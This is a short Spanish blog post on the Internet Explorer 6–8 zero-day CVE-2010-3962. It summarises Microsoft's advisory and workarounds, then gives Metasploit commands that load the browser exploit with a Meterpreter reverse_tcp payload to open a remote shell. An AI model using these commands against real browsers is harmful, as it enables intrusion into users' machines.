[0 Day] RCE en Internet Explorer 6, 7 y 8
INFORMACIÓN
Microsoft publicó un boletín informando de una vulnerabilidad (CVE-2010-3962) que afecta a varias de las versiones soportadas de su navegador Internet Explorer 6, 7 y 8; la cual están investigando y por el momento no tiene un parche de solución.
El principal impacto que puede generar esta vulnerabilidad es la ejecución remota de código (RCE -Remote Code Execution-).
El boletín de Microsoft provee soluciones provisionales para evitar la amenaza, las cuales son:
- Evitar el estilo CSS del sitio usando estilos CSS definidos por el usuario
- Utilizar el kit de herramientas EMET
- Utilizar la protección DEP para IE 7
- Leer correos en modo texto
- Fijar las zonas de Intranet e Internet en modo de seguridad “Alto” para bloquear los controles ActiveX y el Active Scripting en esas zonas.
También se informa que el Internet Explorer 9 (Beta) no es afectado y se puede usar sin problemas. En el caso de Internet Explorer 8 en su instalación con valores por defecto es poco probable que sea afectado ya que ofrece la protección DEP.
El módulo explota una vulnerabilidad de corrupción de memoria en el motor HTML de Microsoft (MSHTML). Al analizar una página HTML que contiene una etiqueta especialmente diseñada en CSS provoca la corrupción de memoria lo que conlleva a la ejecución de código arbitrario.
Exploit
Código
use exploit/windows/browser/ms10_xxx_ie_css_clip
Payload
Código
set PAYLOAD windows/meterpreter/reverse_tcp
Comandos del Metasploit
Código
use exploit/windows/browser/ms10_xxx_ie_css_ clip set SRVHOST IP set payload windows/meterpreter/reverse_tcp set LHOST IP exploit
Video
Debido a algunos problemas con mis máquinas virtuales, opté por poner un vídeo de un tercero.
Visto en: :http://daw-labs.com/rce-en-internet-explorer-6-7-y-8/